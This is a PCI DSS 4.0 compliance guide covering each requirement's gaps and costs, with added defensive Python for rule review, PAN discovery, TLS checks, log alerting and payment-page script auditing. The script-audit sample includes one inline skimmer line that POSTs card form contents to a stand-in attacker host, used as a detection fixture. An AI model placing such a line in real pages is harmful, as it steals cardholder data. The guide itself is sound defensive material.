PCI DSS 4.0 Requirements Overview
PCI DSS 4.0 has 12 requirements grouped under 6 goals. Version 3.2.1 was retired on 31 March 2024, and the controls that v4.0 had marked as future-dated became mandatory on 31 March 2025, so all merchants must now comply with the full v4.0 set. Here's what each requirement costs to implement and where organisations commonly fail.
Install and Maintain Network Security Controls
Difficulty: Medium
Firewalls and other network security controls (NSCs) must protect the cardholder data environment (CDE) from untrusted networks.
What it means in practice
You need documented network diagrams, firewall rule sets reviewed at least every 6 months, and clear separation between your payment network and everything else.
Common gaps
- No documented network diagram
- Firewall rules never reviewed or cleaned up
- No formal change management for network changes
- CDE not properly segmented from corporate network
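The six-monthly rule review is where most of these gaps surface. What a reviewer actually looks for is mechanical enough to script: permits that are broader than the documented business need, rules with no justification on record, and rules nobody has looked at since the last assessment. The following is an added example, not code from the original page or from any firewall vendor; it works on a constructed CSV export with assumed column names (`id, action, src, dst, dport, justification, last_reviewed`), since every product dumps rules in its own format.

```python
import csv
import io
from datetime import date, timedelta

# Constructed sample rule export, not from any real device. Columns mirror what
# most firewalls can dump: rule id, action, source, destination, destination port,
# the business justification Req 1.2.5/1.3.x expect to see, and last review date.
SAMPLE_RULES = """\
id,action,src,dst,dport,justification,last_reviewed
10,permit,any,cde-db-01,5432,,2023-01-15
20,permit,corp-lan,cde-app-01,443,Checkout API from corporate users,2024-11-02
30,permit,10.20.0.0/24,any,any,Temporary troubleshooting,2024-02-01
35,permit,any,any,any,Legacy rule nobody owns,2024-11-02
40,deny,any,any,any,Default deny,2024-11-02
"""

REVIEW_INTERVAL = timedelta(days=182)  # Req 1.2.7: review NSC configurations at least every six months


def review_rules(rules_csv: str, today_iso: str) -> list:
    """Return one finding per problem as {'id': rule id, 'issue': text}."""
    today = date.fromisoformat(today_iso)
    findings = []
    for row in csv.DictReader(io.StringIO(rules_csv)):
        rid = row["id"]
        if row["action"] == "permit":
            # Over-broad permits: traffic into and out of the CDE must be limited
            # to what the documented business need requires.
            if row["src"] == "any" and row["dst"] == "any" and row["dport"] == "any":
                findings.append({"id": rid, "issue": "permit any/any/any"})
            elif row["src"] == "any":
                findings.append({"id": rid, "issue": "permits from any source"})
            elif row["dst"] == "any" or row["dport"] == "any":
                findings.append({"id": rid, "issue": "over-broad destination or port"})
            if not row["justification"].strip():
                findings.append({"id": rid, "issue": "no documented business justification"})
        # Staleness applies to every rule, deny rules included.
        reviewed = date.fromisoformat(row["last_reviewed"])
        if today - reviewed > REVIEW_INTERVAL:
            findings.append({"id": rid, "issue": f"not reviewed since {reviewed.isoformat()}"})
    return findings


if __name__ == "__main__":
    for f in review_rules(SAMPLE_RULES, "2025-03-31"):
        print(f"rule {f['id']}: {f['issue']}")
```

Run against the sample with a review date of 2025-03-31, rules 10, 30 and 35 produce findings and the explicit default deny (rule 40) does not. The script is evidence for the review, not a substitute for it: each finding still needs an owner to either fix the rule or write down why it stays.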
Implementation cost
$500–$50,000
Next-gen firewall + configuration review. Higher for large, segmented networks.
Apply Secure Configurations to All System Components
Difficulty: Low
Default vendor passwords and settings must be changed. All system components must be configured to industry standards.
What it means in practice
No default passwords. Disable all unnecessary services. Apply CIS Benchmarks or equivalent to every system in scope. Document it.
Common gaps
- Default credentials still in use on networking equipment
- Unnecessary services running (FTP, Telnet)
- No configuration baseline documented
Implementation cost
$1,000–$20,000
Configuration management tooling + audit time. Ongoing for patch cycles.
Protect Stored Account Data
Difficulty: High
Account data must not be stored unless there is a documented business need, and sensitive authentication data must not be retained after authorisation. Any PAN that is stored must be rendered unreadable.
What it means in practice
You must know exactly where card data lives, including logs, backups and test systems. PAN stored at rest must be rendered unreadable using one of the methods Requirement 3.5.1 allows: strong cryptography with managed keys (AES-128 or stronger; the standard names no particular cipher or key size beyond "strong cryptography"), truncation, an index token, or a keyed cryptographic hash (an unkeyed SHA-256 of a PAN no longer qualifies under 3.5.1.1). Sensitive authentication data (full track data, card verification code, PIN or PIN block) must never be retained after authorisation, even if encrypted.
Common gaps
- Card data stored in unencrypted log files
- Developers storing PANs in test databases
- CVV data found in application logs
- No key rotation process
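The first three gaps are all discovered the same way: sweep logs, dumps and test databases for anything that looks like a PAN, then check whether a sensitive-authentication-data field sits next to it. The following is an added example, not code from the original page; it runs over a few constructed log lines (the card numbers are the standard Visa and Mastercard test PANs) and shows the three pieces a practitioner needs: a Luhn-filtered PAN finder, a redactor that keeps only the truncated first-six/last-four form, and a keyed hash for the reference value a system may keep instead of the PAN. The field-name list for sensitive authentication data is an assumption for illustration.

```python
import hashlib
import hmac
import re

# Constructed sample log lines (not from a real system). The card numbers are
# the well-known Visa/Mastercard test PANs; the 16-digit session id is not a PAN.
SAMPLE_LOG = """\
2025-03-31T10:01:02Z checkout INFO order=7781 amount=49.99 status=approved
2025-03-31T10:01:03Z checkout DEBUG request={"pan":"4111111111111111","cvv":"123","exp":"12/27"}
2025-03-31T10:01:04Z checkout INFO session=9876543210123456 ok
2025-03-31T10:01:05Z checkout WARN retry for 5500 0000 0000 0004
"""

# 13-19 digits, optionally separated by spaces or dashes, not embedded in a longer digit run.
CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")
# Field names under which sensitive authentication data tends to leak into logs (assumed list).
SAD_FIELD = re.compile(r"(?i)\b(cvv2?|cvc2?|cav2|cid|track[12]?|pin_?block)\b")


def luhn_ok(digits: str) -> bool:
    """Luhn check: cuts most false positives from order ids, session ids and timestamps."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def _digits(match_text: str) -> str:
    return re.sub(r"[ -]", "", match_text)


def find_pans(text: str) -> list:
    """Every Luhn-valid 13-19 digit run in the text, separators removed."""
    out = []
    for m in CANDIDATE.finditer(text):
        d = _digits(m.group())
        if 13 <= len(d) <= 19 and luhn_ok(d):
            out.append(d)
    return out


def redact(line: str) -> str:
    """Replace each PAN with its truncated form (first six, last four), the usual
    truncation format for a 16-digit PAN, which is no longer PAN and may stay in a log."""
    def mask(m):
        d = _digits(m.group())
        if 13 <= len(d) <= 19 and luhn_ok(d):
            return d[:6] + "*" * (len(d) - 10) + d[-4:]
        return m.group()
    return CANDIDATE.sub(mask, line)


def pan_reference(pan: str, key: bytes) -> str:
    """Keyed hash (HMAC-SHA256) of a PAN for lookups, per Req 3.5.1.1. An unkeyed
    hash is not acceptable: the PAN space is small enough to brute-force offline."""
    return hmac.new(key, pan.encode(), hashlib.sha256).hexdigest()


def scan_log(text: str) -> list:
    """One finding per line that carries a PAN or a sensitive-authentication-data field."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        pans = find_pans(line)
        sad = SAD_FIELD.search(line) is not None
        if pans or sad:
            findings.append({"line": n, "pans": pans, "sad": sad})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: PANs={f['pans']} sensitive-auth-data-field={f['sad']}")
    print(redact(SAMPLE_LOG.splitlines()[1]))
```

On the sample, line 2 is the serious one: a PAN and a CVV logged together at DEBUG level, which is a storage violation no amount of encryption fixes. Line 3's session id is 16 digits but fails Luhn and is left alone; line 4 shows why the finder has to tolerate spaces. A real sweep runs this over log archives, database dumps and backups, because those are where assessors find PANs the application team did not know existed.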
Implementation cost
$5,000–$100,000
Tokenisation platforms, key management infrastructure, data discovery tools.
Protect Cardholder Data with Strong Cryptography During Transmission
Difficulty: Low
Card data transmitted over open, public networks must be encrypted using strong cryptography (in practice TLS 1.2 or 1.3).
What it means in practice
All payment data in transit must use TLS 1.2 or 1.3. No SSL, no TLS 1.0/1.1. This includes internal network transmissions if they cross untrusted segments.
Common gaps
- Legacy TLS 1.0/1.1 still enabled
- Self-signed certs without proper validation
- Internal services using unencrypted HTTP
- Certificate expiry not monitored
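Two of these gaps (legacy protocol versions still enabled, certificate expiry unmonitored) are easy to check from the outside and worth checking continuously rather than once before the assessment. The following is an added example, not code from the original page; it uses only the Python standard library `ssl` module and assumes a script name of `tls_check.py`. The version probe deliberately disables certificate verification because it is testing what the server will negotiate, not whether its chain is trusted; the hardened client context shows the settings a payment client should actually run with.

```python
import socket
import ssl
import sys
import time
from typing import Optional

POLICY_VERSIONS = {"TLSv1.2", "TLSv1.3"}        # what "strong cryptography" means for TLS today (Req 4.2.1)
POLICY_MINIMUM = ssl.TLSVersion.TLSv1_2
LEGACY_VERSIONS = (ssl.TLSVersion.SSLv3, ssl.TLSVersion.TLSv1, ssl.TLSVersion.TLSv1_1)


def hardened_client_context() -> ssl.SSLContext:
    """Client side: refuse anything below TLS 1.2, validate the chain, check the hostname."""
    ctx = ssl.create_default_context()   # CERT_REQUIRED and check_hostname=True by default
    ctx.minimum_version = POLICY_MINIMUM
    return ctx


def accepted_by_policy(negotiated: Optional[str]) -> bool:
    """`negotiated` is the string SSLSocket.version() returns after a handshake."""
    return negotiated in POLICY_VERSIONS


def server_offers(host: str, port: int, version: ssl.TLSVersion, timeout: float = 5.0) -> Optional[bool]:
    """Probe whether a server completes a handshake at exactly `version`.
    Verification is off on purpose: this tests protocol support, not trust.
    Returns None when this client cannot even offer the version (OpenSSL builds
    without TLS 1.0/1.1), which is not evidence that the server rejects it."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    try:
        ctx.set_ciphers("DEFAULT:@SECLEVEL=0")   # let an OpenSSL 3 client offer legacy versions at all
        ctx.minimum_version = version
        ctx.maximum_version = version
    except (ssl.SSLError, ValueError):
        return None
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                return tls.version() is not None
    except (ssl.SSLError, OSError):
        return False


def expiry_epoch(not_after: str) -> int:
    """`not_after` in the format getpeercert() uses, e.g. 'Jun  1 12:00:00 2026 GMT'."""
    return int(ssl.cert_time_to_seconds(not_after))


def days_until_expiry(not_after: str, now_epoch: int) -> int:
    return (expiry_epoch(not_after) - now_epoch) // 86400


def check_endpoint(host: str, port: int = 443, warn_days: int = 30) -> list:
    """Findings for one endpoint: legacy versions accepted, certificate close to expiry."""
    issues = []
    for v in LEGACY_VERSIONS:
        if server_offers(host, port, v):
            issues.append(f"accepts {v.name}")
    with socket.create_connection((host, port), timeout=5.0) as sock:
        with hardened_client_context().wrap_socket(sock, server_hostname=host) as tls:
            if not accepted_by_policy(tls.version()):
                issues.append(f"negotiated {tls.version()}")
            days = days_until_expiry(tls.getpeercert()["notAfter"], int(time.time()))
            if days < warn_days:
                issues.append(f"certificate expires in {days} days")
    return issues


if __name__ == "__main__":
    if len(sys.argv) >= 2:
        host = sys.argv[1]
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 443
        print(check_endpoint(host, port) or "no findings")
    else:
        print("usage: tls_check.py HOST [PORT]")
```

`python tls_check.py payments.example.com` lists the problems for one endpoint; scheduling it against every in-scope hostname gives you the expiry monitoring and the protocol evidence an assessor asks for. The None result from the probe matters: a hardened scanning host may be unable to speak TLS 1.0 itself, and treating that as "server rejects TLS 1.0" would be a false pass.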
Implementation cost
$500–$10,000
Certificate management, TLS configuration audit. Usually low cost but requires ongoing renewal.
Protect All Systems and Networks from Malicious Software
Difficulty: Low
Antivirus and anti-malware must be deployed on all systems susceptible to malware. Must be kept current and actively running.
What it means in practice
Endpoint protection on all in-scope systems, with centralised management and scan logs that are retained and reviewed. Any system you exclude as "not at risk from malware" needs a documented targeted risk analysis that is re-evaluated periodically (Req 5.2.3). PCI DSS 4.0 also added explicit anti-phishing controls (Req 5.4.1): automated mechanisms that detect phishing and protect personnel from it, not just awareness training.
Common gaps
- AV definitions not automatically updated
- No centralised management console
- Servers excluded from AV scanning
- No phishing simulation or training programme
Implementation cost
$2,000–$30,000/year
Endpoint protection platform (EPP/EDR) licensing. Enterprise solutions add behaviour analytics.
Develop and Maintain Secure Systems and Software
Difficulty: High
All software must be developed securely. Vulnerabilities must be identified and patched. Web-facing applications must be protected from known attacks.
What it means in practice
Formal patch management with defined SLAs: critical and high-risk security patches within one month of release, the rest on a schedule your targeted risk analysis justifies (Req 6.3.3). For public-facing web applications, an automated solution that continually detects and prevents web-based attacks, in practice a WAF (Req 6.4.2). For e-commerce, PCI DSS 4.0 added payment page script controls: every script loaded in the consumer's browser must be inventoried, authorised with a written justification and protected from unauthorised modification (Req 6.4.3), backed by a change-and-tamper detection mechanism that alerts on unexpected changes to the payment page and its HTTP headers (Req 11.6.1).
Common gaps
- No formal patch management SLAs
- No WAF protecting checkout page
- Third-party JavaScript on payment pages not inventoried
- Developers not trained in secure coding (OWASP)
Implementation cost
$5,000–$80,000/year
WAF ($3k–$30k/year), DAST scanning, code review tools, patch management platform.
Restrict Access to System Components and Cardholder Data
Difficulty: Medium
Access to card data must be restricted to the minimum necessary (need to know). Role-based access controls must be documented.
What it means in practice
Least privilege and need to know: document who has access to what, and why. Review all user accounts and their privileges at least once every six months (Req 7.2.4) and revoke anything no longer justified. No shared accounts. Application and system accounts are in scope too: limit them to the privileges the application actually needs.
Common gaps
- Shared/generic accounts used by multiple people
- Access never revoked when staff leave
- No formal access request/approval process
- Database access not restricted to application service accounts
Implementation cost
$1,000–$15,000
Access control tooling, IAM platform, quarterly review process labour.
Identify Users and Authenticate Access to System Components
Difficulty: Medium
Every user must have a unique ID. MFA required for all access into the CDE and all remote access. Passwords must meet minimum requirements.
What it means in practice
MFA is non-negotiable in PCI DSS 4.0: for all non-console access into the CDE, including administrators coming from the internal network and not just remote users (Req 8.4.2), and for all remote access into the entity's network (Req 8.4.3). Passwords must be at least 12 characters (8 only where a system cannot support 12) and contain both letters and digits (Req 8.3.6). No shared accounts. Interactive login to system and application accounts must be prevented unless explicitly justified and approved (Req 8.6.1).
Common gaps
- MFA not enforced for remote access
- Shared admin accounts
- Weak password policies still in place
- Service accounts with passwords that never expire
Implementation cost
$2,000–$20,000/year
MFA solution (Duo, Okta, etc.) + password manager deployment + policy enforcement.
Restrict Physical Access to Cardholder Data
Difficulty: Low
Physical access to systems and media containing card data must be restricted and logged.
What it means in practice
Badged access to server rooms. Visitor logs. Media destruction policy. Point-of-sale terminal tamper checks. No card data on paper left unattended.
Common gaps
- No visitor log for server room/data centre
- POS terminals not inspected for tampering
- Paper records with card data not securely destroyed
- Media disposal not tracked
Implementation cost
$500–$10,000
Physical access controls, badge systems, video surveillance, media shredding services.
Log and Monitor All Access to System Components and Cardholder Data
Difficulty: High
Audit logs must capture all access to cardholder data. Logs must be reviewed daily and retained for 12 months (3 months immediately available).
What it means in practice
SIEM or centralised log management is effectively required at scale. Logs from all in-scope systems. Automated alerting on suspicious activity. Log integrity protection.
Common gaps
- No centralised logging — logs siloed on individual servers
- Logs not reviewed regularly (just stored)
- Log retention below 12 months
- No alerting on failed login attempts or privilege escalation
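"Logs reviewed daily" at any real volume means automated detection with a human looking at the alerts, and the two cases named in the last gap (failed-login bursts and privilege escalation) are the first rules any CDE log pipeline should carry. The following is an added example, not code from the original page or from any SIEM vendor; it runs over a few constructed syslog-style lines from two hypothetical CDE hosts (`cde-db-01`, `cde-app-01`) and the thresholds are assumptions to tune, not values from the standard.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed syslog-style lines from two CDE hosts (not from a real system).
SAMPLE_LOG = """\
2025-03-31T09:00:01Z cde-db-01 sshd[2011]: Failed password for invalid user admin from 203.0.113.9 port 51001 ssh2
2025-03-31T09:00:03Z cde-db-01 sshd[2012]: Failed password for invalid user oracle from 203.0.113.9 port 51002 ssh2
2025-03-31T09:00:05Z cde-db-01 sshd[2013]: Failed password for root from 203.0.113.9 port 51003 ssh2
2025-03-31T09:00:07Z cde-db-01 sshd[2014]: Failed password for root from 203.0.113.9 port 51004 ssh2
2025-03-31T09:00:09Z cde-db-01 sshd[2015]: Failed password for root from 203.0.113.9 port 51005 ssh2
2025-03-31T09:00:12Z cde-db-01 sshd[2016]: Accepted password for dbadmin from 203.0.113.9 port 51006 ssh2
2025-03-31T09:00:40Z cde-db-01 sudo: dbadmin : TTY=pts/0 ; PWD=/home/dbadmin ; USER=root ; COMMAND=/bin/bash
2025-03-31T09:15:00Z cde-app-01 sshd[3100]: Failed password for deploy from 10.10.5.20 port 40200 ssh2
2025-03-31T09:15:30Z cde-app-01 sshd[3101]: Accepted publickey for deploy from 10.10.5.20 port 40201 ssh2
"""

LINE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<prog>[\w-]+)(?:\[\d+\])?: (?P<msg>.*)$")
FAILED = re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)")
ACCEPTED = re.compile(r"Accepted \w+ for (?P<user>\S+) from (?P<src>\S+)")
SUDO = re.compile(r"^(?P<user>\S+) : .*USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")

FAIL_THRESHOLD = 5      # failures from one source against one host ...
WINDOW_SECONDS = 60     # ... within this many seconds (both values are assumptions to tune)


def parse(line: str):
    """Split a syslog-style line into timestamp, host, program and message."""
    m = LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return rec


def detect(log_text: str) -> list:
    """Return (rule, host, subject, detail) tuples in the order the rules fire."""
    alerts = []
    recent = defaultdict(deque)   # (host, source ip) -> timestamps of recent failures
    bursts = set()                # (host, source ip) pairs that already tripped the threshold
    for rec in filter(None, map(parse, log_text.splitlines())):
        msg, t = rec["msg"], rec["time"]
        if rec["prog"] == "sshd":
            f = FAILED.search(msg)
            if f:
                key = (rec["host"], f["src"])
                q = recent[key]
                q.append(t)
                while (t - q[0]).total_seconds() > WINDOW_SECONDS:   # slide the window
                    q.popleft()
                if len(q) >= FAIL_THRESHOLD and key not in bursts:
                    bursts.add(key)
                    alerts.append(("brute_force", rec["host"], f["src"],
                                   f"{len(q)} failures in {WINDOW_SECONDS}s"))
                continue
            a = ACCEPTED.search(msg)
            # A success from a source that just hammered the host is the alert that matters most.
            if a and (rec["host"], a["src"]) in bursts:
                alerts.append(("success_after_burst", rec["host"], a["src"], f"user {a['user']}"))
        elif rec["prog"] == "sudo":
            s = SUDO.match(msg)
            if s and s["target"] == "root":
                alerts.append(("privilege_escalation", rec["host"], s["user"], s["cmd"]))
    return alerts


if __name__ == "__main__":
    for rule, host, subject, detail in detect(SAMPLE_LOG):
        print(f"{rule:22} {host:12} {subject:14} {detail}")
```

On the sample, `cde-db-01` produces three alerts in sequence (burst, a successful login from the same address, then a root shell via sudo) and `cde-app-01` produces none: one failure followed by a key-based login is normal. The point for Requirement 10 is that each alert lands in front of a person the same day and the response is recorded; the detection itself is the easy part.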
Implementation cost
$5,000–$100,000/year
SIEM platform (Splunk, Elastic, Sentinel) or managed security operations. This is often the largest ongoing cost.
Test Security of Systems and Networks Regularly
Difficulty: Medium
Regular vulnerability scans (quarterly external by ASV) and annual penetration tests are mandatory. Wireless scanning if applicable.
What it means in practice
External vulnerability scans at least every three months by an Approved Scanning Vendor (ASV), repeated until you have a passing report. Internal vulnerability scans at the same cadence, and in 4.0 these must be authenticated scans (Req 11.3.1.2). Annual penetration test, internal and external, by a qualified internal or external tester, plus segmentation testing at least annually (every six months for service providers). Re-scan and re-test after any significant change.
Common gaps
- Pen test done once but findings never remediated
- Scans not re-run after significant system changes
- No internal vulnerability scanning
- Pen test scope excluded key systems to save money
Implementation cost
$3,000–$80,000/year
ASV scanning ($800–$5,000/year), penetration test ($5,000–$50,000/engagement). Segmentation pen tests add cost.
Support Information Security with Organisational Policies and Programmes
Difficulty: Medium
A formal, documented information security policy. Annual risk assessment. Incident response plan. Annual security training for all relevant staff.
What it means in practice
Written policies for everything. Annual review. Risk assessment documented. Incident response plan tested. All staff with access to card data trained at hire and annually.
Common gaps
- Policies exist but were written once and never updated
- No formal risk assessment process
- Incident response plan never tested
- Training done once at hire, never repeated
Implementation cost
$2,000–$30,000
Policy writing/review (consultancy or internal time), training platform, IR plan testing exercise.
New in PCI DSS 4.0
Key changes from v3.2.1 that affect compliance costs:
- MFA now required for all access into the cardholder data environment — not just remote access
- Payment page script security (Req 6.4.3) and change-and-tamper detection for payment pages (Req 11.6.1): inventory and authorise all scripts on payment pages; detect and respond to unauthorised changes
- Customised approach: an organisation may meet a requirement's stated objective with a control of its own design, provided it documents a targeted risk analysis (Req 12.3.2) and the assessor validates the control. Targeted risk analyses (Req 12.3.1) also now set how often several periodic controls run
- 12-character minimum password length (up from 7) with complexity requirements
- Anti-phishing controls added under Requirement 5
- Penetration testing scope clarified: segmentation testing required when network segmentation is used to reduce scope
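The script inventory under Requirement 6 above and the 6.4.3/11.6.1 bullet here come down to the same check: fetch the payment page the way a customer's browser would, list every script it loads, and compare that list against the written inventory. The following is an added example, not code from the original page or from any tamper-detection product; it parses a constructed payment page with Python's standard-library HTML parser, pins external scripts by their subresource-integrity value and inline scripts by a hash of their text, and reports anything unauthorised or changed. The inventory entries, URLs and the `sha384-AAA` integrity value are placeholders for illustration.

```python
import base64
import hashlib
from html.parser import HTMLParser

# Constructed payment page as fetched from the live site (not a real merchant).
# The fourth script is the kind of change 6.4.3/11.6.1 exist to catch: it was
# never authorised and posts the card form's contents to a third party.
PAGE_HTML = """<html><head>
<script src="https://js.example-psp.com/v3/checkout.js"
        integrity="sha384-AAA" crossorigin="anonymous"></script>
<script src="https://cdn.example.com/analytics.js"></script>
</head><body>
<form id="card"></form>
<script>window.__cfg = {merchant: "M123"};</script>
<script>fetch("https://evil.example/c", {method: "POST", body: document.forms[0].innerHTML});</script>
</body></html>"""


def sri_hash(body: str) -> str:
    """Subresource-integrity style digest of script text."""
    return "sha256-" + base64.b64encode(hashlib.sha256(body.encode()).digest()).decode()


# Authorised inventory (Req 6.4.3): every script with a written justification.
# External scripts are pinned by the SRI value the page must carry ("sha384-AAA"
# is a placeholder; a real entry holds the base64 SHA-384 of the file). Inline
# scripts are pinned by the hash of their own text.
INVENTORY = {
    "https://js.example-psp.com/v3/checkout.js": {"justification": "PSP hosted card fields", "integrity": "sha384-AAA"},
    sri_hash('window.__cfg = {merchant: "M123"};'): {"justification": "Merchant config for PSP SDK", "integrity": None},
}


class ScriptCollector(HTMLParser):
    """Collects every <script> on the page with its src, integrity attribute and inline text."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._open = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._open = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        if self._open is not None:
            self._open["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._open is not None:
            self.scripts.append(self._open)
            self._open = None


def audit_page(html: str, inventory: dict) -> list:
    """One finding per script that is unauthorised, unpinned or changed since authorisation."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for s in p.scripts:
        if s["src"]:
            entry = inventory.get(s["src"])
            if entry is None:
                findings.append({"script": s["src"], "issue": "not in authorised inventory"})
            elif not s["integrity"]:
                findings.append({"script": s["src"], "issue": "no SRI integrity attribute"})
            elif s["integrity"] != entry["integrity"]:
                findings.append({"script": s["src"], "issue": "integrity differs from inventory"})
        else:
            h = sri_hash(s["body"].strip())
            if h not in inventory:
                findings.append({"script": "inline " + h, "issue": "inline script not in inventory"})
    return findings


if __name__ == "__main__":
    for f in audit_page(PAGE_HTML, INVENTORY):
        print(f"{f['issue']}: {f['script']}")
```

Against the sample, the PSP script and the merchant config pass, the analytics script is flagged because nobody authorised it, and the inline skimmer is flagged because its hash matches nothing in the inventory. Run on a schedule from outside your own network, with the output compared to the previous run, this is the detection half of 11.6.1; the other half is the alert reaching someone who can pull the page. Note that SRI pins what the browser executes only for external scripts; a script that loads further scripts at runtime needs the same treatment one level down.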